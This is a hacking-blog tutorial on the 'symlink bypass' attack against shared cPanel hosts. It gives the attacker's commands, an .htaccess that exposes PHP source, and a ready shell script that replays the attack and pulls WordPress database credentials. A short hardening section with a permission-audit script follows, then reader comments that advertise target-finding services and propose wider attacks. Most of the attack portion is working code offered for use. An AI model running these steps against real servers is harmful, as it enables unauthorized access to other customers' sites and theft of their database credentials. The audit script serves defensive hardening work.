Hacker, Researcher and Author.

How Hackers Are Hacking Into Websites On Shared Hosts - Symlink Bypass Explained

You might have noticed a tremendous increase in the number of attacks on WordPress, Joomla and other content management systems. Instead of targeting the CMS itself, the attackers target any vulnerable website on the same shared server. Once they gain access to that one site, they upload a shell and use a method called "symlink bypass" to read the configuration files of other websites hosted on the same server. The database credentials in those files then let them connect to the target site's database through a simple MySQL interface.


Avinash, a security student and researcher, will explain step by step how hackers break into websites on shared hosts using the method called symlink bypassing.

What Is Symlink Bypass?

I will not go into much detail here. For this article all you need to know is that a symlink (symbolic link) is a file that references another file or folder on Linux, much like a shortcut in Windows. Symlink bypassing is a method of reaching folders on a shared server that the attacker's account is not supposed to see: every customer on a shared host has a home directory under /home, and normally one customer cannot read another customer's files. When the web server follows symlinks and the other customers' files are readable by the web server, a symlink created from the compromised account lets the attacker read those files through the web server as if they were his own.


Step 1 - The hacker searches for a vulnerable website on the server. A list of the domains hosted on a web server can be obtained with a reverse IP lookup.

Step 2 - Next the hacker breaks into any vulnerable website on the server and uploads a PHP shell.


Step 3 - The above picture shows two files, one named .htaccess and the second named jaugar.izri, being uploaded to the server. Here is what jaugar.izri looks like once it is made accessible by setting 0755 permissions on it.



Step 4 - The hacker connects to the izri script and then enters the following commands:

mkdir 1111
cd 1111
ln -s / root
ls -la /etc/valiases/(site.com)


The first command creates a directory named 1111 (mkdir 1111). The next command changes into that directory (cd 1111). The third command creates a symlink named root that points at the filesystem root /. The fourth command lists the cPanel alias file of the target domain; that file is owned by the hosting account that runs the site, so the owner column of the ls -la output reveals the target's user name.


The target domain is entered in place of site.com in ls -la /etc/valiases/site.com.


The above screenshot shows the whole story. The hacker then navigates to the 1111 directory, where the target website's configuration file is reachable through the root symlink (/home/<user>/public_html/wp-config.php for a WordPress site, with <user> being the name found in the previous step). Because the web server follows the symlink, the hacker downloads the configuration file, and the database credentials in it let him connect to the target's database and make any changes there.
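The four steps above replayed end to end, as an added example that is not the post's own code: a POSIX shell script that runs the attacker's commands against a constructed sandbox tree (a fake /etc/valiases entry and a fake /home/<user>/public_html/wp-config.php) so it can be run offline. The sandbox directory stands in for / on the victim host; the domain victim.example and the credentials in the config file are made up; and the .htaccess contents are the ones usually paired with this technique, assumed here because the post does not show the file.

```shell
#!/bin/sh
# Added example, not code from the original post. $base stands in for "/"
# on the victim host; on a real cPanel server the commands are exactly the
# ones quoted in Step 4, with the base argument left empty.

# Build a constructed cPanel-style layout under $1:
#   etc/valiases/<domain>    - alias file, owned by the hosting account
#   home/<user>/public_html  - that account's web root with wp-config.php
# In the sandbox the only owner we can produce is ourselves (id -un).
make_sandbox() {
    sb_user=$(id -un)
    mkdir -p "$1/etc/valiases" "$1/home/$sb_user/public_html"
    : > "$1/etc/valiases/victim.example"
    cat > "$1/home/$sb_user/public_html/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'victim_wp');
define('DB_USER', 'victim_dbuser');
define('DB_PASSWORD', 'constructed-not-real');
EOF
}

# Step 4, fourth command: the owner of /etc/valiases/<domain> is the
# account that hosts the domain. Usage: account_for_domain DOMAIN [BASE]
account_for_domain() {
    ls -ld "${2:-}/etc/valiases/$1" | awk '{print $3}'
}

# Step 4, first three commands: a directory holding a symlink named "root"
# that points at the filesystem root. Usage: make_root_link WORKDIR [BASE]
make_root_link() {
    mkdir -p "$1"
    ln -sfn "${2:-/}" "$1/root"
    echo "$1/root"
}

# Assumed .htaccess (the post only shows it being uploaded): tells Apache
# to follow symlinks and to serve .php files as text instead of running them.
write_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
Options +FollowSymLinks
DirectoryIndex index.htm
RemoveHandler .php .phtml
AddType text/plain .php .phtml
EOF
}

# Path the attacker requests through the web server: through the "root"
# link into the victim account's config. Usage: config_via_link WORKDIR USER
config_via_link() {
    echo "$1/root/home/$2/public_html/wp-config.php"
}

# The database settings the hacker copies into a MySQL client afterwards.
db_creds() {
    grep -E "define\('DB_(NAME|USER|PASSWORD|HOST)'" "$1"
}

demo() {
    sb=$(mktemp -d)
    make_sandbox "$sb"
    victim=$(account_for_domain victim.example "$sb")
    work="$sb/home/attacker/public_html/1111"
    make_root_link "$work" "$sb" >/dev/null
    write_htaccess "$work"
    echo "target account: $victim"
    db_creds "$(config_via_link "$work" "$victim")"
    rm -rf "$sb"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run it as `sh symlink_demo.sh demo`. In the sandbox the alias file is necessarily owned by whoever runs the script, so the owner column simply echoes your own user name; on a real cPanel host it is the victim's account, which is the whole point of the fourth command. Reading the file with grep stands in for the browser request: the web server only returns the contents if it follows symlinks and the victim's file is readable by the user the web server runs as.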


How To Be Protected?

There is not much you can do on your end, other than renaming your configuration file and moving it to a safer place (outside the web root, with permissions that let only your own account read it). The real fix belongs to the hosting provider: run each customer's PHP as that customer's own user, replace FollowSymLinks with SymLinksIfOwnerMatch, and keep customers' home directories unreadable by other accounts. If you are worried about your website's security, feel free to contact me.
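An added example (not from the original post) of the check a hosting administrator, or a customer with SSH access, would want after reading this: a POSIX shell script that finds WordPress and Joomla configuration files under any account's public_html that are readable by other local users, which is the precondition for the symlink bypass, and tightens them to 0640. The directory tree, the account names alice and bob, and the file contents are constructed for the demonstration; in real use the root argument is left empty so the script walks /home.

```shell
#!/bin/sh
# Added example, not code from the original post. The root argument stands
# in for "/" so the script can run on a constructed tree; on a real host
# call the functions with an empty root and they walk /home directly.

# CMS config files that hold database credentials (WordPress, Joomla).
CONFIG_NAMES='wp-config.php configuration.php'

# List config files under any account's public_html that carry the
# "others read" bit (-perm -004), i.e. readable by every local user and
# therefore by the web server acting for another customer's account.
world_readable_configs() {
    for name in $CONFIG_NAMES; do
        find "${1:-}/home" -path '*/public_html/*' -name "$name" -perm -004
    done | sort
}

# Restrict each reported file to owner and group (0640). With PHP executed
# as the account owner (suPHP, CGI or per-user FPM pools) the site keeps
# working, but the server can no longer read it on behalf of someone else.
restrict_configs() {
    world_readable_configs "$1" | while IFS= read -r f; do
        chmod 0640 "$f"
        echo "fixed $f"
    done
}

# Constructed sandbox: alice's config is world readable, bob's is not.
make_sandbox() {
    mkdir -p "$1/home/alice/public_html" "$1/home/bob/public_html"
    echo "<?php define('DB_PASSWORD', 'constructed-a');" > "$1/home/alice/public_html/wp-config.php"
    echo "<?php \$password = 'constructed-b';" > "$1/home/bob/public_html/configuration.php"
    chmod 0644 "$1/home/alice/public_html/wp-config.php"
    chmod 0600 "$1/home/bob/public_html/configuration.php"
}

if [ "${1:-}" = demo ]; then
    r=$(mktemp -d)
    make_sandbox "$r"
    echo "before:"; world_readable_configs "$r"
    restrict_configs "$r"
    echo "after:"; world_readable_configs "$r"
    rm -rf "$r"
fi
```

Run it as `sh config_audit.sh demo`. If PHP on the host still runs as the shared web-server user (classic mod_php), 0640 will break the site, and that is exactly the configuration that makes the symlink bypass possible in the first place; the fix then has to come from the provider, as the section above says.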



About The Author:


Avinash is a security researcher and a blogger. He runs a blog, http://avisuni.blogspot.com, where he writes about hacking. He promises to be a regular contributor here at RHA, and RHA welcomes talent.

12 comments:

  1. All the best Avinash and welcome to the RHA Authors Family

    Nice heading to learn, but it seems to me this is a little bit advanced for newbies. However, thank you very much.

    Regards
    M.Gazzaly
    http://greenhathacker.blogspot.com
  2. Very nice to see your post here on RHA, Avinash! Keep going, good work!
  3. Thanks Srikanth Rao & Sushant

  4. well, love to do it manually but :p there are l0ts 0v t00lz ;P
  5. superhitbusiness.com
    is an example of a website which was hacked 2 months ago and now contains nothing
  6. Really crazy yar
    watch more on
    http://www.gtuhacker.blogspot.com

  7. Find vulnerable websites on a shared hosted server with logontube.com

    The best reverse IP lookup service

    http://logontube.com
  8. I didn't understand a thing in here. I know how to get access to a server by shell uploading, but then what steps did he use, and what tool did he use for symlink bypass? I need a proper tutorial for this.
  9. Really a Nice Tutorial.
    Thanks For Sharing :)

  10. I can explain a method to gain access to more than just one site, but every hosted site and beyond, by combining symlink and cPanel!!! And in fact you do not need to search for a weak site but simply buy hosting on the target server.

© 2016 All Rights Reserved by RHA Info Sec.